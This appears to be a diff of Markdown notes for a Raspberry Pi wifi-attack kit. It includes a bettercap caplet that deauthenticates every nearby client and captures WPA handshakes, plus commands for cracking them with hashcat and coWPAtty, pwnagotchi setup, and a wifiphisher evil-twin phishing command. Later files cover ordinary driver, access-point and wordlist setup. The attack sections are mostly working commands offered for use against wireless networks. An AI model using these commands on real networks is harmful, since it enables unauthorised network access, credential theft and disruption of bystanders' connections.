# - deauth every client from each one of them
set ticker.period 5
set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap
# uncomment to only hop on these channels:
# wifi.recon.channel 1,2,3
wifi.recon on
ticker on
net.sniff on
# we'll see lots of probes after each deauth, just skip the noise ...
events.ignore wifi.client.probe
# start fresh
events.clear
clear
```
To start bettercap with this caplet run:
```bash
ifconfig wlan0 up
bettercap -iface wlan0 -caplet /usr/share/bettercap/caplets/<caplet-name>.cap
```
# Sources and more
[Evilsocket](https://www.evilsocket.net/2018/07/28/Project-PITA-Writeup-build-a-mini-mass-deauther-using-bettercap-and-a-Raspberry-Pi-Zero-W/)
[Bettercap](https://www.bettercap.org/)
[CyberPunk.rs](https://www.cyberpunk.rs/install-mitm-attack-framework-bettercap)

16
tools/cowpatty.md Normal file
View File

@ -0,0 +1,16 @@
# coWPAtty
Brute-force dictionary attack against WPA-PSK/WPA2-PSK
```bash
sudo apt install git clang
git clone https://github.com/joswr1ght/cowpatty.git
cd cowpatty
make
make install
```
Example
```bash
./cowpatty -r eap-test.dump -f dict -s somethingclever
./cowpatty -r eap-test.dump -d hashfile -s somethingclever
```

62
tools/hashcat.md Normal file
View File

@ -0,0 +1,62 @@
# Hashcat
Install Hashcat from source
```bash
sudo apt install build-essential cmake
git clone https://github.com/hashcat/hashcat.git
cd hashcat
sudo make
sudo make install
```
Install Hashcat legacy from source
```bash
sudo apt install git lzip make m4 mingw-w64
git clone https://github.com/hashcat/hashcat-legacy.git
cd hashcat
sudo ./tools/deps.sh
make linux
```
Install Hashcat from binary
```bash
sudo apt install p7zip-full -y
wget https://hashcat.net/files/hashcat-6.2.5.7z
7z x hashcat-6.2.5.7z
cd hashcat-6.2.5.7zcd
```
Install Hashcat-Utils
```bash
git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils
sudo make
```
## 4-way Handshake Cracking
Once we have succesfully captured the EAPOL frames required by hashcat in order to crack the PSK, well need to convert the pcap output file to the hccapx format that hashcat can read. In order to do so, we can either use this online service, or install the hashcat-utils ourselves and convert the file locally:
```bash
/hashcat-util/cap2hccapx /wifi-handshakes.pcap wifi-handshakes.hccapx
```
You can now proceed to crack the handshake(s) either by dictionary attack or brute-force. For instance, to try all 8-digits combinations:
```bash
/hashcat/hashcat -m2500 -a3 -w3 wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'
```
And this is it, the evergreen deauthentication attack in all its simplicity, performed with just one tool … lets get to the fun part now :)
## PMKID Cracking
Well now need to convert the PMKID data in the pcap file we just captured to a hash format that hashcat can understand, for this well use hcxpcaptool:
```bash
/hashcat-tools/hcxpcaptool -z wifi-handshakes.pmkid wifi-handshakes.pcap
```
We can now proceed cracking the wifi.handshake.pmkid file so generated by using algorithm number 16800:
```bash
/hashcat/hashcat -m16800 -a3 -w3 wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
```
# Sources and more
[Hashat](https://hashcat.net/wiki/)
[InfiniteLogins](https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-custom-wordlists/)

125
tools/pwnagotchi.md Normal file
View File

@ -0,0 +1,125 @@
# Pwnagotchi
Pwnagotchi is a standalone project for RaspberryPi Zeros but can be installed on other Linux systems too.
You need to have [bettercap](bettercap.md) and `libpcap` installed.
```bash
sudo apt install libpcap0.8
```
## Bettercap Caplets
Depending on the name of the WiFi interface youre going to use, youll need to edit the `/usr/local/share/bettercap/caplets/pwnagotchi-auto.cap` and `/usr/local/share/bettercap/caplets/pwnagotchi-manual.cap` caplet files accordingly.
In the default Pwnagotchi image bettercap is running as a systemd service through a launcher script `/etc/systemd/system/bettercap.service` with the following content:
```bash
[Unit]
Description=bettercap api.rest service.
Documentation=https://bettercap.org
Wants=network.target
After=pwngrid.service
[Service]
Type=simple
PermissionsStartOnly=true
ExecStart=/usr/bin/bettercap-launcher
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
```
And this is `/usr/bin/bettercap-launcher`
```bash
#!/usr/bin/env bash
/usr/bin/monstart
if [[ $(ifconfig | grep usb0 | grep RUNNING) ]] || [[ $(cat /sys/class/net/eth0/carrier) ]]; then
# if override file exists, go into auto mode
if [ -f /root/.pwnagotchi-auto ]; then
/usr/bin/bettercap -no-colors -caplet pwnagotchi-auto -iface mon0
else
/usr/bin/bettercap -no-colors -caplet pwnagotchi-manual -iface mon0
fi
else
/usr/bin/bettercap -no-colors -caplet pwnagotchi-auto -iface mon0
fi
```
Again the interface name and the command to start the monitor mode need to be adjusted for the specific computer and WiFi card.
## PwnGrid
The second service we will need is pwngrid:
```bash
wget "https://github.com/evilsocket/pwngrid/releases/download/v1.10.3/pwngrid_linux_amd64_v1.10.3.zip"
unzip pwngrid_linux_amd64_v1.10.3.zip
sudo mv pwngrid /usr/bin/
# generate the keypair
sudo pwngrid -generate -keys /etc/pwnagotchi
```
Alternate make it yourself from source
```bash
git clone https://github.com/evilsocket/pwngrid.git
cd pwngrid
make
make install
```
Pwngrid runs via the `/etc/systemd/system/pwngrid-peer.service` systemd service, don't forget to change your interface
```bash
[Unit]
Description=pwngrid peer service.
Documentation=https://pwnagotchi.ai
Wants=network.target
[Service]
Type=simple
PermissionsStartOnly=true
ExecStart=/usr/bin/pwngrid -keys /etc/pwnagotchi -address 127.0.0.1:8666 -client-token /root/.api-enrollment.json -wait -log /var/log/pwngrid-peer.log -iface mon0
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
```
## PwnaGotchi
The last ingredient is going to be the python3 Pwnagotchi main codebase
```bash
wget "https://github.com/evilsocket/pwnagotchi/archive/v1.4.3.zip"
unzip v1.4.3.zip
cd pwnagotchi-1.4.3
sudo pip3 install -r requirements.txt
sudo pip3 install .
```
Also alternativ compile it yourself from source
```bash
git clone https://github.com/evilsocket/pwnagotchi.git
cd pwnagotchi
sudo pip3 install -r requirements.txt
make
sudo make install
```
Assuming both bettercap and pwngrid are configured and running correctly, we can now start pwnagotchi
```bash
# AUTO mode
sudo pwnagotchi
# AUTO mode with debug logs
sudo pwnagotchi --debug
# MANU mode
sudo pwnagotchi --manual
# MANU mode with debug logs
sudo pwnagotchi --manual --debug
# show the other options
pwnagotchi -h
```
This will install the default configuration file in `/etc/pwnagotchi/default.toml`, in order to apply customizations youll need to create a new `/etc/pwnagotchi/config.toml` file as explained in the configuration section.
## RPi Tweaks
1. having an ethernet port allows you an easier connection to the booted system. Just connect a cable to the port and Pwnagotchi get an IP address with DHCP. If a plugged ethernet cable is detected on boot it will start in MANU mode
2. in order to improve battery duration and reduce power requirements you can lower cpu frequency (underclocking). Edit your `/boot/config.txt` and add/uncomment the `arm_freq=800` line
3. to run the Pi3 you need at least 2.5A, but 2A should be enough if you underclocked
# Sources and more
[Pwnagotchi](https://pwnagotchi.ai)

24
tools/wifipisher.md Executable file
View File

@ -0,0 +1,24 @@
# Wifipisher
Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with malware. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.
From the victims perspective, the attack takes place in three phases:
- Victim is deauthenticated from their access point.
- Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
- Victim is served a realistic specially-customized phishing page.
## install
Download the latest revision
```bash
git clone https://github.com/wifiphisher/wifiphisher.git
# Switch to tool's directory
cd wifiphisher
# Install any dependencies
apt-get install libnl-3-dev libnl-genl-3-dev
pip3 install PyRic pbkdf2
sudo python3 setup.py install
```
to use `wifiphisher -nJ --essid "FREE WI-FI" -p oauth-login -kB`
# Source and more informations
[Wifipisher](https://wifiphisher.org/docs.html)

12
tools/xerosploit.md Normal file
View File

@ -0,0 +1,12 @@
# Xerosploit
Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.
Dependencies will be automatically installed.
```bash
git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit
```
# Sources and more
[Xerosploit](https://github.com/LionSec/xerosploit)

81
wifi driver.md Executable file
View File

@ -0,0 +1,81 @@
# Network client
To configure your network and network-devices it is important to know how they work. Here is a little overview of the network client.
```bash
nmcli connection add ifname <INTERFACE> type wifi ssid <SSID>
nmcli connection edit <CONNECTION>
nmcli> goto wifi
nmcli 802-11-wireless> set mode infrastructure
nmcli 802-11-wireless> back
nmcli> goto wifi-sec
nmcli 802-11-wireless-security> set key-mgmt wpa-psk
nmcli 802-11-wireless-security> set psk
nmcli 802-11-wireless-security> save
nmcli 802-11-wireless-security> quit
```
## Add Wifi Drivers for RTL8812BU
The RTL8812BU is an often used chip built into USB-Wifi-Modules. It's very useful if you want to use more than the in-build wifi or scan multiple networks parallel.
```bash
# get requirements
sudo apt install git build-essential dkms raspberrypi-kernel-headers
# get scripts
git clone https://github.com/cilynx/rtl88x2bu
cd rtl88x2bu/
# Configure for RasPi
sed -i 's/I386_PC = y/I386_PC = n/' Makefile
sed -i 's/ARM_RPI = n/ARM_RPI = y/' Makefile
# setup DKMS
VER=$(sed -n 's/\PACKAGE_VERSION="\(.*\)"/\1/p' dkms.conf)
sudo rsync -rvhP ./ /usr/src/rtl88x2bu-${VER}
sudo dkms add -m rtl88x2bu -v ${VER}
# building will take a while
sudo dkms build -m rtl88x2bu -v ${VER}
sudo dkms install -m rtl88x2bu -v ${VER}
# automatically load at boot
echo 8812bu | sudo tee -a /etc/modules
# Plug in your adapter then confirm your new interface name
ip addr
```
After the reboot you should find a new network device when plugged in. Check it with `ifconfig`
# Add Wifi Driver for RTL8812AU
Alpha builds very good Wifi antennas that support much more software tweaks, monitor mode and on. (Those drivers are already included in Kali Linux.) For example i use the Alpha AWUS036ACH Module.
Check if the driver already exists
```bash
modprobe 8812au
systemctl restart network-manager
```
As no errors appear, everything should be alright and your network manager already knew the driver.
If not get it now:
```bash
# get requirements
sudo apt install git build-essential dkms raspberrypi-kernel-headers
# get scripts
git clone https://github.com/gnab/rtl8812au.git
cd rtl8812au/
# Configure for RasPi
sed -i 's/I386_PC = y/I386_PC = n/' Makefile
sed -i 's/ARM_RPI = n/ARM_RPI = y/' Makefile
# setup and install
sudo make dkms_install
# automatically load at boot
echo 8812au | sudo tee -a /etc/modules
# Plug in your adapter then confirm your new interface name
ip addr
```
# change interface modes
Many tools can set the interface modes on their own. But you can do or re-do that with those little commands:
- Set interface down `sudo ip link set <interface> down`
- Set monitor mode `sudo iwconfig <interface> mode monitor`
- Set interface up `sudo ip link set <interface> up`

164
wifi.md Normal file
View File

@ -0,0 +1,164 @@
# Wifi
## enable automatic networking
This step is required if you can't connect to a network via cable. It will activate your wifi connection at startup.
Insert the SD card into the computer (not RPi).
Create and open a file named `wpa_supplicant.conf` in the `/boot` folder of the SD card and add the following
```bash[/boot/wpa_supplicant.conf]
country=US # replace with your country code
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
network={
ssid="<WIFI_NETWORK_NAME>"
psk="<WIFI_PASSWORD>"
key_mgmt=WPA-PSK
}
```
Replace WIFI_NETWORK_NAME and WIFI_PASSWORD with the actual name and password of your Wi-Fi network.
To add further networks just add new `network` Objects with credentials.
## hide your credentials
As the file can be accessed and read by anybody who has access to the SD card or user you can also use a tool to hide your password.
```bash
wpa_passphrase <WIFI_NETWORK_NAME> <WIFI_PASSWORD> >> \etc\wpa_supplicant\wpa_supplicant.conf
```
The network should be added automatically. Check the file `/etc/wpa_supplicant/wpa_supplicant.conf` and edit what's missing
```bash
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
country=DE
network={# example network
ssid="<WIFI_NETWORK_NAME>" # also called SSID
scan_ssid=1
psk=<32byte-key> # instead of password
key_mgmt=WPA-PSK
id_str="home" # short name to call this network
}
```
Now you can restart the wifi device to connect properly
```bash
wpa_cli -i wlan0 reconfigure
ifconfig wlan0
```
Now the RPi should automatically connect to the Wi-Fi network on boot.
## deactivate DHCP
If you got multiple RPis or Devices in your Network, it is practical to call them by their hostname instead of using DHCP. Therefore change the file `/etc/network/interfaces`
```bash
auto lo
iface lo inet loopback
allow-hotplug eth0
iface eth0 inet dhcp
allow-hotplug wlan0
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
post-up ifdown eth0
iface default inet dhcp
```
Remember that hostnames may not be identical! Change the hostnames by editing `/etc/hostname`
## RPi as AP
Get all requirements and make them ready to configure
```bash
sudo apt-get install hostapd dnsmasq
sudo systemctl stop hostapd
sudo systemctl stop dnsmasq
```
We assume the standard home network IP address is like 192.168.###.###. Therefore we assign the IP address 192.168.0.10 to the wlan0 interface by editing the dhcpcd configuration file `/etc/dhcpcd.conf`, add the following lines at the end:
```bash
interface wlan0
static ip_address=192.168.0.10/24
denyinterfaces eth0
denyinterfaces wlan0
```
The last two lines are needed in order to make the bridge work.
Now we configure the DHCP server via dnsmasq. Rename the default configuration file and create a new one
```bash
sudo mv /etc/dnsmasq.conf /etc/dnsmasq.conf.orig
sudo nano /etc/dnsmasq.conf
```
Add these lines to the new config file
```bash
interface=wlan0
dhcp-range=192.168.0.11,192.168.0.30,255.255.255.0,24h
```
To edit hostapd we create a new file `sudo nano /etc/hostapd/hostapd.conf` and add the following
```bash
interface=wlan0
bridge=br0
hw_mode=g
channel=7
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
ssid=<NETWORK>
wpa_passphrase=<NETWORKPASSWORD>
```
To show the system the location of the config file open `/etc/default/hostapd` and search "#DEAMON_CONF=" to delete the `#` and put the path of the config file into the quotes: `DAEMON_CONF="/etc/hostapd/hostapd.conf"`
### Forward traffic
We can connect to the RPi via wlan0 but we don't get any internet connection. So to forward traffic over to the ethernet cable, we have wlan0 forward everything via ethernet cable to the modem. Edit `/etc/sysctl.conf`, find the line `#net.ipv4.ip_forward=1` and delete the `#`.
Next add IP masquerading for outbound traffic on eth0 using `sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE` abd save tghe new iptables rule `sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"`.
To load the rule on boot, edit the file `/etc/rc.local` and add the following line just above the line exit 0: `iptables-restore < /etc/iptables.ipv4.nat`. Now the traffic should be forwarded correctly.
To enable the internet connection by using a bridge. Therefore install `bridge-utils`
```bash
sudo apt-get install bridge-utils
# add a new bridge called br0
sudo brctl addbr br0
# connect eth0 interface to bridge
sudo brctl addif br0 eth0
# edit the interfaces file
sudo nano /etc/network/interfaces
```
and add the following lines at the end file
```bash
auto br0
iface br0 inet manual
bridge_ports eth0 wlan0
```
Reboot to make all changes happen.
# NetworkManager
`nmcli` is a commandline tool for controlling NetworkManager.
Just change <WifiInterface>, <WiFiSSID>, <WiFiPassword> in the following commands to reflect your setup. If WiFi info already saved, easier way using <SavedWiFiConn> name of connection as it was saved in NetworkManager.
- list of saved connections `nmcli c`
- list of available WiFi hotspots `nmcli d wifi list` or `sudo iwlist wlan0 scanning`
- list of interfaces `ifconfig -a`
- Disconnect an interface `nmcli d disconnect <WifiInterface>`
- Connect an interface `nmcli d connect <WifiInterface>`
If you already got an connection saved in your manager you can also use:
- disconnect: `nmcli c down <SavedWiFiConn>`
- connect: `nmcli c up <SavedWiFiConn>`
To connect to a new access point:
- `nmcli d wifi connect <WiFiSSID> password <WiFiPassword> iface <WifiInterface>`
- and to disconnect `nmcli d disconnect iface <WifiInterface>`
If your password isn't automatically recognized type this: `nmcli -a c up <SavedWiFiConn>`
# Sources and more
- [webonomic.nl](https://dev.webonomic.nl/4-ways-to-connect-your-raspberry-pi-4-to-the-internet)
- [roboticsbackend.com](https://roboticsbackend.com/enable-ssh-on-raspberry-pi-raspbian/)

84
wordlists.md Executable file
View File

@ -0,0 +1,84 @@
# Wordlists
Wordlists are simple text-files, collections of passwords and most commonly used words for dictionary-attacks.
## generate your own lists with Crunch
Crunch generates dictionary files containing words with a minimum and maxumum length and a given set of characters. The output can be saved to a single file.
```bash
sudo apt install crunch
crunch <minimum> <maximum> <characters> -o <output>.txt
# example 6 characters
crunch 6 6 0123456789abcdef -o sixcharacters.txt
```
Any set of characters can be used. The wordlists are created trough combination and permutation of a set of characters. The more characters and length (variation) the bigger the file gets!
## build your lists with Cewl
Cewl is another dictionary generator but instead of random combinations Cewl crawls a URL t a defined depthand produce a list of keywords.
```bash
sudo apt install cewl
cewl <URL>
# to save as a file
cewl <URL> -w <filename>.txt
# set a minimum word length
cewl <URL> -m <length>
# to gather only emails you can use -e and combine it with -n
cewl <URL> -e -n
# normally cewl only gets alphabetic words, get alpha-numerics with:
cewl <URL> --with-numbers
# to count how often a single word appears
cewl <URL> -c
# set the depth level
cewl <URL> -d <number>
```
## build your lists with twofi
The idea behind twofi is using Twitter to get a list of keywords and search terms related to the terms being cracked.
```bash
sudo apt install twofi
```
To use this tool you need an Twitter API key, get your own at `https://developer.twitter.com/en/apply-for-access` and paste your Key and Secret it into `/etc/twofi/twofi.yml`.
After that you can scan twitter accounts to generate wordlists:
```bash
# get words from a single user and write into file `wordlist.txt`
twofi -u <twitterusername> > wordlist.txt
# get words with minimum length
twofi -m 6 <twitterusername>
# get words from multiple users
twofi -u <username>, <username>, <username>
```
## pregenerated lists
There are many collections of passwords and wordlists commonly used for dictionary-attacks using a variety of password cracking tools such as aircrack-ng, hydra and hashcat.
You can download those lists for example here:
```bash
git clone https://github.com/kennyn510/wpa2-wordlists.git
cd wpa2-wordlists/Wordlists/example2016
gunzip *.gz
# combine all lists to one single file
cat *.txt >> full.txt
```
Another source of wordlists can be found here:
```bash
git clone htps://github.com/berzerk0/Probable-Wordlists
```
## Useful one-liners for wordlist manipulation
- Remove duplicates `awk '!(count[$0]++)' old.txt > new.txt`
- Sort by length `awk '{print length, $0}' old.txt | sort -n | cut -d " " -f2- > new.txt`
- Sort by alphabetical order `sort old.txt | uniq > new.txt`
- Merge multiple text files into one `cat file1.txt file2.txt > combined.txt`
- Remove all blank lines `egrep -v "^[[:space:]]*$" old.txt > new.txt`
- Sort and remove duplicates `sort wordlist.txt | uniq -u > cleaned_wordlist.txt`
# Source and more
- [Kali Tools](https://www.kali.org/tools/)
- [GeeksForGeeks.org](https://www.geeksforgeeks.org/cewl-tool-creating-custom-wordlists-tool-in-kali-linux/)
- [stuffjasondoes.com](https://stuffjasondoes.com/2018/07/18/creating-custom-wordlists-for-targeted-attacks-with-cewl/)
- [Techyrick](https://techyrick.com/twofi/)
- [Digi.ninja](https://digi.ninja/projects/twofi.php)